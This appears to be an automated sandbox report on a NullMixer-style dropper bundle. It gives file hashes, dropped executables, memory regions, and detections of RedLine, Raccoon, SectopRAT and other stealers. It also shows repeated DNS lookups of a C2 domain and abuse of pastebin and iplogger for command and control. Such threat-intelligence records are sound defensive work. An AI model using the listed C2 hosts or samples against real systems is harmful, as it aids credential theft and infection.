SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

memory/3516-81-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3516-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3516-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3516-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3516-74-0x000000006494A000-0x000000006494F000-memory.dmp

memory/3516-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3516-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3516-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3516-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3516-65-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3516-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/760-285-0x0000000002410000-0x000000000256D000-memory.dmp

memory/2828-286-0x0000000002720000-0x000000000287D000-memory.dmp

memory/2828-287-0x0000000002C30000-0x0000000002CD6000-memory.dmp

memory/2828-291-0x0000000002CE0000-0x0000000002D73000-memory.dmp

memory/2828-289-0x0000000002CE0000-0x0000000002D73000-memory.dmp

memory/760-314-0x0000000002AD0000-0x0000000002B63000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20241010-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
